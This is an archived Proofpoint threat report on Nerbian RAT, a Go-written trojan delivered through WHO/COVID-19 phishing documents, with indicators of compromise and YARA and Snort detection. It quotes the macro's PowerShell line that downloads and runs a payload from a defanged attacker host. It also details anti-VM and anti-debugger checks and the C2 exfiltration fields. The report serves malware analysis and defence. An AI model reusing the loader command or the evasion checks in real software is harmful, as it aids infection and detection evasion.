{
	"id": "9b8431dc-3361-473e-ac66-b57149ad5cc8",
	"created_at": "2026-04-06T00:10:42.050133Z",
	"updated_at": "2026-04-10T03:22:02.885272Z",
	"deleted_at": null,
	"sha1_hash": "9a976383c33428e1bb1df751af98e7f5b4e90ab8",
	"title": "Nerbian RAT Using COVID-19 Themes Features Sophisticated Evasion Techniques | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2020039,
	"plain_text": "Nerbian RAT Using COVID-19 Themes Features Sophisticated Evasion\r\nTechniques | Proofpoint US\r\nBy May 11, 2022 Andrew Northern, Pim Trouerbach, Tony Robinson, Axel F\r\nPublished: 2022-05-10 · Archived: 2026-04-05 16:40:37 UTC\r\nKey Findings\r\nProofpoint has analyzed a novel malware variant which utilizes significant anti-analysis and anti-reversing\r\ncapabilities.\r\nThe malware, written in the Go programming language, uses multiple open-source Go libraries for conducting\r\nmalicious activities.\r\nThe malware, called Nerbian remote access trojan (RAT) leverages COVID-19 and World Health Organization\r\nthemes to spread.\r\nProofpoint researchers named the malware based on a named function in the malware code. Nerbia is a fictional\r\nplace from the novel Don Quixote. \r\nOverview\r\nThe newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including\r\nmultiple open-source libraries. It is written in operating system (OS) agnostic Go programming language, compiled for 64-\r\nbit systems, and leverages several encryption routines to further evade network analysis. Go is an increasingly popular\r\nlanguage used by threat actors, likely due to its lower barrier to entry and ease of use. \r\nCampaign Details\r\nStarting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware\r\ncampaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.\r\nThe emails claimed to be representing the World Health Organization (WHO) with important information regarding\r\nCOVID-19. The malware sample was also noted by security researcher pr0xylife on Twitter. 
Proofpoint researchers\r\nobserved the following indicators and attachments:\r\nFrom: who.inter.svc@gmail[.]com, announce@who-international[.]com\r\nSubjects: WHO, World Health Organization\r\nAttachment Names and Types: who_covid19.rar with who_covid19.doc inside, covid19guide.rar with covid19guide.doc\r\ninside, covid-19.doc\r\nThe messages that purport to be from WHO and include safety measures relating to COVID-19 include an attached Word\r\ndocument containing macros.\r\nFigure 1: Example email that purports to be from WHO.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques\r\nPage 1 of 12\n\nFigure 2: Attached Word document.\r\nThe emails contain a macro-laden Word attachment (sometimes compressed with RAR). When macros are enabled, the\r\ndocument reveals information relating to COVID-19 safety, specifically about self-isolation and caring for individuals with\r\nCOVID-19. Interestingly, the lure is similar to themes used in the early days of the pandemic in 2020, specifically spoofing\r\nthe WHO to distribute information about the virus. 
\r\nFigure 3: Screenshot of the document lure containing COVID-19 guidance, specifically what users see when they enable\r\nmacros on the malicious document.\r\nIn addition to masquerading as the WHO, the document also appears to contain logos from the Health Service Executive\r\n(HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).\r\nFigure 4: Document with additional logos related to government and non-profit entities.\r\nAttack Path\r\nWhen users enable macros on this document, the document executes an embedded macro that drops a .bat file with the\r\nfollowing contents:\r\npowershell IWR -Uri hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog -OutFile C:\\Users\\[username]\\AppData\\Roaming\\UpdateUAV.exe ;C:\\Users\\[username]\\AppData\\Roaming\\UpdateUAV.exe\r\nThis batch file performs a PowerShell Invoke Web Request (IWR) to the URL:\r\nhxxps://www[.]fernandestechnical[.]com/pub/media/gitlog\r\nIt renames the downloaded file to UpdateUAV.exe, and drops it into:\r\nC:\\Users\\[current user]\\AppData\\Roaming\\UpdateUAV.exe\r\nDropper: UpdateUAV.exe\r\nUpdateUAV.exe is the payload initially downloaded from the malicious Word document. It is a 64-bit executable, written in\r\nGolang, 3.5MB in size, and UPX packed. Executable files created in the Go language tend to be slightly larger than most\r\nother executable files. Likely, this malware is packed with UPX to reduce the overall size of the executable being\r\ndownloaded. Unpacked, the file is 6.6MB in total.\r\nFigure 5: The UpdateUAV.exe payload is packed with UPX, likely in an effort to reduce its size.\r\nProofpoint analysts extracted decrypted data during execution. The resulting memory revealed additional information about\r\nthe sample.
\r\nFunctionality\r\nUpdateUAV.exe is a dropper for Nerbian RAT. This determination was made through multiple different observations. First is\r\nthe string embedded in the sample:\r\nK:/W_Work/Golang/src/RAT_Dropper/main_gen.go\r\nAccording to the source path, this executable is a dropper. Proofpoint named this malware “Nerbian RAT” based on one of\r\nthe function names in the dropper. The specific function name is “main_downloadNerbian” as shown in the following figure.\r\nFigure 6: Nerbian RAT main function code.\r\nThere are additional references to \"Nerbian\" in some of the Go functions scattered throughout the binary.\r\nFigure 7: Functions referring to the RAT the dropper is meant to download and store on the compromised system.\r\nCode Reuse\r\nMost software developers, including malware developers, use existing software packages. The UpdateUAV executable,\r\nwhich is a dropper for Nerbian RAT, features a lot of code re-use, with strings referencing various GitHub projects:\r\ngithub.com/go-ole/go-ole – Go bindings for Windows COM (Component Object Model – inter-process communication)\r\ngithub.com/gonutz/w32/v2 – Go bindings for the Win32 API\r\ngithub.com/mitchellh/go-ps – Library that implements OS-specific APIs to list and manipulate processes\r\ngithub.com/StackExchange/wmi – Go package for Windows WMI, providing a WQL interface\r\nOut of all these references to external projects, the most interesting is:\r\ngithub.com/p3tr0v/chacal/\r\nAnti-Debug, Anti-VM, Anti-Forensics\r\nFigure 8: Chacal GitHub page.\r\nChacal is described as “Golang anti-vm framework for Red Team and Pentesters”. 
However, there are several functions and\r\nreferences in the project designed to make debugging and reverse engineering more difficult as well.\r\nThe dropper will stop execution if it encounters any of the following conditions:\r\nThe size of the hard disk on the system is less than a certain size. The default defined in Chacal is 100GB.\r\nThe name of the hard disk, according to WMI, contains one of the following strings:\r\n\"virtual\"\r\n\"vbox\"\r\n\"vmware\"\r\nThe MAC address queried returns any of the following OUI values:\r\n00:0c:29, 00:50:56, 08:00:27, 52:54:00, 00:21:F6, 00:14:4F, 00:0F:4B, 00:10:E0, 00:00:7D, 00:21:28,\r\n00:01:5D, 00:21:F6, 00:A0:A4, 00:07:82, 00:03:BA, 08:00:20, 2C:C2:60, 00:10:4F, 00:0F:4B, 00:13:97,\r\n00:20:F2, 00:14:4F\r\nAny of the following reverse engineering/debugging programs are encountered in the process list:\r\nprocesshacker.exe, procmon.exe, pestudio.exe, procmon64.exe, x32dbg.exe, x64dbg.exe, CFF Explorer.exe,\r\nprocexp64.exe, procexp.exe, pslist.exe, tcpview.exe, tcpvcon.exe, dbgview.exe, RAMMap.exe,\r\nRAMMap64.exe, vmmap.exe, ollydbg.exe, agent.py, autoruns.exe, autorunsc.exe, filemon.exe, regmon.exe,\r\nidaq.exe, idaq64.exe, ImmunityDebugger.exe, Wireshark.exe, dumpcap.exe, HookExplorer.exe,\r\nImportREC.exe, PETools.exe, LordPE.exe, SysInspector.exe, proc_analyzer.exe, sysAnalyzer.exe,\r\nsniff_hit.exe, windbg.exe, joeboxcontrol.exe, joeboxserver.exe, joeboxserver.exe, ResourceHacker.exe,\r\nFiddler.exe, httpdebugger.exe\r\nAny of the following memory analysis/memory tampering programs are present in the process list:\r\nDumpIt.exe, RAMMap.exe, RAMMap64.exe, vmmap.exe\r\nA time measurement function checks to see if the amount of time elapsed executing specific functions is deemed\r\n\"excessive\". 
If the time threshold is reached, the malware assumes it is being debugged, and will exit.\r\nIn addition to the anti-reversing checks provided by Chacal, there are other anti-analysis checks present in the binary\r\nincluding:\r\nUses the IsDebuggerPresent API to determine if the executable is being debugged\r\nAppears to query for the following network interface names:\r\nIntel® PRO/1000 MT Network Connection\r\nLoopback Pseudo-Interface 1\r\nSoftware Loopback Interface 1\r\nDownload, Execution, and Persistence\r\nIn the case of the analyzed sample, the dropper attempted to download its payload from:\r\nhxxps://www[.]fernandestechnical[.]com/pub/media/ssl\r\nand will save the RAT to:\r\nC:\\ProgramData\\USOShared\\MoUsoCore.exe\r\nNext, the dropper will attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload\r\nhourly to establish persistence.\r\nThe dropper's end-goal is to download the executable named SSL, save it as MoUsoCore.exe, and configure a scheduled\r\ntask to run it hourly as its primary persistence mechanism.\r\nPayload - MoUsoCore.exe\r\nMoUsoCore.exe is the name of the payload that the dropper binary, UpdateUAV.exe, attempts to download and establish\r\npersistence for. Like the dropper itself, it is written in Go, and is UPX packed. The size of the binary in its packed state is\r\n5.6MB, while in its unpacked state it is 9.2MB.\r\nFunctionality and Configuration Settings\r\nNerbian RAT seems to support a variety of different functions, most of which are dictated by encrypted configuration\r\nsettings in the binary itself. 
Proofpoint identified various configuration settings this sample utilizes:\r\n\"185.121.139[.]249\"\r\nhttps://www[.]fernandestechnical[.]com/pub/health_check.php\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d\r\n\"100\"\r\n\\\\\\\\ProgramData\\\\\\\\Microsoft OneDrive\\\\\\\\setup\r\n\"rev.sav\"\r\n===Configuration===\r\ndefault_communication_protocol: %s\r\ndefault_conn_interval: %d\r\nb_use_alive_signal: %t\r\nstart_worktime: %d\r\nend_worktime: %d\r\nalive_interval: %d\r\nb_use_secondary_host: %t\r\nb_use_sleep_filetransfer: %t\r\ntime_sleep_filetransfer: %d\r\nretry_count_filetransfer: %d\r\nconnection_error_sleep_time: %d\r\nbpreflaged_use_backupserver: %t\r\nflagged_time_backupserver: %s\r\nswitch_backupserver_time: %d\r\nprimary_host: %s\r\nsecondary_host: %s\r\nprimary_http_proxyserver: %s\r\nsecondary_http_proxyserver: %s\r\nworking_directory: %s\r\nb_run_cmd_result_outfile: %t\r\nidle_state_limit_time: %d\r\nst:%d\r\nnt: %d\r\nMany of these strings pertain to setting operating parameters for the malware such as what hosts it communicates with, how\r\noften it checks in to the C2 domains and IP addresses with keep-alive messages, the malware’s preferred working directory,\r\nand the hours in which it operates, in addition to other parameters.\r\nIt's likely that 185[.]121[.]139[.]249 and hxxps://www[.]fernandestechnical[.]com/pub/health_check.php are the designated\r\nC2 backup domains and URI for keep-alives and check-ins.\r\nKeylogging\r\nThe RAT appears to have the ability to log keystrokes and appears to write them, encrypted, to the rev.sav file mentioned in\r\nthe configuration settings above.\r\nScreen Capture\r\nNot unlike the dropper, the RAT utilizes a lot of pre-existing Go code to perform many of its 
functions:\r\ngithub.com/lxn/win\r\ngithub.com/go-ole/go-ole\r\ngithub.com/StackExchange/wmi\r\ngithub.com/digitalocean/go-smbios/smbios\r\ngithub.com/AllenDang/w32.init\r\nAgain, out of all of these, one of the more interesting external references is to the following GitHub repo:\r\n           github.com/kbinani/screenshot/ \r\nThis repo is a Go library for performing screen captures on a variety of different operating systems.\r\nC2 Communications\r\nAs with most modern malware families, this RAT prefers to handle its communications over SSL. Proofpoint observed two\r\ntypes of network traffic. The first is a simple Heartbeat/Keep-Alive to the C2 domains/IP addresses.\r\nFigure 9: The Heartbeat/Keep-alive traffic to the C2 domain/IP addresses. Please disregard the extra \"p\" at the end of\r\n/pub/health_check.php.\r\nAdditional communication observed was a POST request to the configured C2 domains and IP addresses with a large\r\ncollection of HTTP form data being uploaded in the request:\r\nFigure 10: Notice the different names in the Content-Disposition field for each form in this POST request. All of this data is\r\nboth base64 encoded and encrypted, regardless of whether the C2 communication is happening over HTTP or HTTPS.\r\nForm-data names being posted to the C2 server include:\r\naddr_post – IP address posting to\r\nport_post – network port posting to\r\nauth_post – likely a per-session encryption key or password used after initializing the C2 communication\r\nsession_key – the only field that isn't encrypted. This is a combination of a string that serves as a sort of campaign identifier,\r\na hash of values retrieved via the SMBIOS Golang module, and the operating system designation of the system talking to\r\nthe C2 server (in this case \"windows\"). 
\r\ndata_post – exfiltrated data from the victim host\r\nAll of the fields above, with the exception of the session_key form data field, utilize a unique encryption scheme. The first 70 bytes\r\nof the POST are \"garbage\", while the next 24 bytes contain an AES key that can be used to decrypt the remaining data.\r\nProofpoint researchers developed a Python script that will enable decrypting this posted data:\r\nimport malduck\r\nimport binascii\r\n# base64-encoded addr_post value captured from an internal sandbox run\r\ndata = \"BgxxweBaPoZVPcfLoQFSHMfqqeitJaZjoSKOBrhsCxtDMYGxPUHsKYcXetaTSJaSULtqZQAwoDiTrCtDpVKvaLxjZPSLcLBvlyREEguzuO0Z8119x\r\ndef decrypt_post_param(base64_encoded_content):\r\n    junk = base64_encoded_content[:70]  # leading junk bytes, discarded\r\n    key = base64_encoded_content[70:70+32]  # AES key follows the junk\r\n    print(\"[+] key: %s\" % key)\r\n    crypted_data = base64_encoded_content[70+32:].encode(\"utf-8\")\r\n    base64_decoded = malduck.base64.decode(crypted_data)\r\n    iv = key[:16].encode(\"utf-8\")  # IV is the first 16 bytes of the key\r\n    full_data = base64_decoded\r\n    print(\"[+] crypted data [%d]: %s\" % (len(full_data), binascii.hexlify(full_data)))\r\n    return malduck.aes.cbc.decrypt(key.encode(\"utf-8\"), iv, full_data)\r\n\r\nprint(decrypt_post_param(data))\r\nFigure 11: Python script for decrypting posted data.\r\nUsing the code above, users can decrypt the data being posted. In this instance, Proofpoint chose to decrypt the base64\r\nencoded data from the addr_post field from an internal sandbox run. Users will need to replace the data variable with the\r\nbase64 encoded block they wish to decrypt, or otherwise modify the script to accept input.\r\nAs mentioned above, however, the session_key field is not encrypted; it is base64 encoded. 
What does this field contain?\r\nFigure 12: The value of the session_key field is just a concatenated string, containing three values that are base64 encoded.\r\nWhen submitted to Cyberchef using the From Base64 recipe, the base64 encoded string:\r\nOGZmZTQ1MDU5N2NiYmZhNWE3MDNlMjNhOGI2YmJkYWVkYTc2YmFkZjJiMDM1ZTc1ZGU1ZmZkYjNhZjA3MjcwZDoyNWI0ZWJjYTRiYm\r\nDecodes to:\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d:25b4ebca4bbc82ab5ae2e517c29d33e7:windows\r\nThis string contains three values, concatenated and delimited with the \":\" character. Proofpoint assesses the first value,\r\n8ffe450597cbbfa5a703e23a8b6bbdaeda76badf2b035e75de5ffdb3af07270d, is some sort of implant or campaign\r\nidentifier, while 25b4ebca4bbc82ab5ae2e517c29d33e7 is a value derived from host identifier data collected using the go-smbios library mentioned above, and the final value is the operating system of the compromised host (windows).\r\nFigure 13: The process flow of Nerbian RAT\r\nAssessment\r\nThis is a complex piece of malware, consisting of three stages:\r\nMaldoc phishing lure\r\nDropper that performs a large variety of environment checking – anti-reversing and anti-VM checks\r\nNerbian RAT – encrypted configuration file, extreme care to ensure data is encrypted to the C2\r\nDespite all this complexity and care being taken to protect the data in transit and \"vet\" the compromised host, the dropper\r\nand the RAT itself do not employ heavy obfuscation outside of the sample being packed with UPX, which it can be argued\r\nisn't necessarily for obfuscation, but to simply reduce the size of the executable.\r\nAdditionally, much of the functionality of both the RAT and the dropper is easy to infer due to the strings referring to\r\nGitHub repositories – specifically the Chacal and screenshot repositories expose partial 
functionality of both the dropper\r\nand the RAT.\r\nWhy Nerbian RAT?\r\nAt first it was hard to find any references to \"Nerbian\" on the internet, until Proofpoint analysts came across this passage in\r\nDon Quixote:\r\n“But turn thine eyes to the other side, and thou shalt see in front and\r\nin the van of this other army the ever victorious and never vanquished\r\nTimonel of Carcajona, prince of New Biscay, who comes in armour with\r\narms quartered azure, vert, white, and yellow, and bears on his shield\r\na cat or on a field tawny with a motto which says Miau, which is the\r\nbeginning of the name of his lady, who according to report is the\r\npeerless Miaulina, daughter of the duke Alfeniquen of the Algarve; the\r\nother, who burdens and presses the loins of that powerful charger\r\nand bears arms white as snow and a shield blank and without any\r\ndevice, is a novice knight, a Frenchman by birth, Pierres Papin by\r\nname, lord of the baronies of Utrique; that other, who with\r\niron-shod heels strikes the flanks of that nimble parti-coloured\r\nzebra, and for arms bears azure vair, is the mighty duke of Nerbia,\r\nEspartafilardo del Bosque, who bears for device on his shield an\r\nasparagus plant with a motto in Castilian that says, Rastrea mi\r\nsuerte.”\r\nNerbia is a fictional place from the great novel Don Quixote. The knight from Nerbia had a shield with a crest of asparagus\r\nand a banner reading \"Try your luck\".\r\nFigure 14: Nerbia is a fictional land from the novel Don Quixote. 
The Knight of Nerbia wore a shield with an asparagus\r\ncrest with a Castilian Spanish motto that reads \"Rastrea Mi Suerte,\" which roughly translates to \"Try your luck\" in English.\r\nPlease note that this crest is not associated with the novel and was created because Threat Research at Proofpoint likes to\r\nhave fun.\r\nMany of the strings referencing Nerbia were located in the companion dropper (UpdateUAV.exe). There are no references to\r\nNerbia in the RAT payload itself (MoUsoCore.exe). Proofpoint assesses with high confidence that the dropper and RAT\r\nwere both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the\r\ndropper is statically configured to download and establish persistence for this specific payload at the time of analysis.\r\nIndicators of Compromise\r\nFilename  covid-19.doc\r\nMD5 Hash  d7888fea6047b662a30bf00edac4c3ee\r\nSHA1 Hash  8137670512be55796f612e41602f505955b0bb0c\r\nSHA256 Hash  ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db\r\nFilename  UpdateUAV.exe\r\nMD5 Hash  9cca59eec5af63e42cd845b67cf6df89\r\nSHA1 Hash  178aad6c7918cc495a908944e79143a913630890\r\nSHA256 Hash  1b8c9e7c150bacd466fbe7f12b39883821f23b67cae0a427a57dc37e5ea4390f\r\nNotes  Downloaded from hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog via Powershell Invoke Web\r\nRequest (IWR) to C:\\Users\\[current_user]\\Appdata\\Roaming\\UpdateUAV.exe\r\n64-bit golang executable, UPX packed\r\nFilename  MoUsoCore.exe\r\nMD5 Hash  5d5bc970f975341558b8d2c225ca0115\r\nSHA1 Hash  4f74826ed56cda233cfc12b86fd1b7da4a9f2e56\r\nSHA256 Hash  902c65435b6b44cfda1156b0e7c6a30b2785fa4f2cbb9b1944a66f5146ec7aa5\r\nNotes  Downloaded from hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog via 
Powershell Invoke Web\r\nRequest (IWR) to C:\\Users\\[current_user]\\Appdata\\Roaming\\UpdateUAV.exe\r\n64-bit golang executable, UPX packed\r\nDomain  www[.]fernandestechnical[.]com\r\nNotes  hxxps://www[.]fernandestechnical[.]com/pub/health_check.php\r\nIP Address  185[.]121[.]139[.]249\r\nNotes  Additional IP address identified in the Nerbian RAT (MoUsoCore.exe) configuration.\r\nDetection\r\nNetwork\r\nSnort and Suricata rules are available in the ETOPEN ruleset under SIDs:\r\n2036426 - ET MALWARE Nerbian RAT CnC Checkin\r\n2036427 - ET MALWARE Nerbian RAT Data Exfiltration\r\nStatic\r\nThe YARA rule below should provide host-based static detection of the RAT payload:\r\nrule Nerbian_RAT\r\n{\r\n    meta:\r\n        author = \"ptrouerbach\"\r\n        reference = \"5e6c5a9fda2d20125f6f24e37e8a217a39ff0a5cfddc07ddfdb18049d9ea4597\"\r\n        malfamily = \"NerbianRAT\"\r\n    strings:\r\n        $args_p = \"p-\" ascii\r\n        $args_s = \"s-\" ascii\r\n        $args_h = \"h-\" ascii\r\n        $args_P = \"P-\" ascii\r\n        $hardcoded_aes_key = { 17E87F581F1DF8D6129D65FD50CEB3DD6C4E1C223077CD7D4C595DA6C3DF92B2 }\r\n        $param_auth = \"auth_post\" ascii\r\n        $param_session = \"session_key\" ascii\r\n        $param_data = \"data_post\" ascii\r\n        $param_addr = \"addr_post\" ascii\r\n        $param_port = \"port_post\" ascii\r\n    condition:\r\n        uint16be(0) == 0x4D5A\r\n        and ($hardcoded_aes_key or (all of ($param*) and all of ($args*)))\r\n        and filesize \u003c 10MB\r\n}\r\nAdditional Acknowledgements\r\nProofpoint security researchers would like to thank security researcher pr0xylife for sharing his observations of this threat on\r\nsocial media.\r\nSource: 
https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques"
	],
	"report_names": [
		"nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434242,
	"ts_updated_at": 1775791322,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.pdf",
		"text": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.txt",
		"img": "https://archive.orkl.eu/9a976383c33428e1bb1df751af98e7f5b4e90ab8.jpg"
	}
}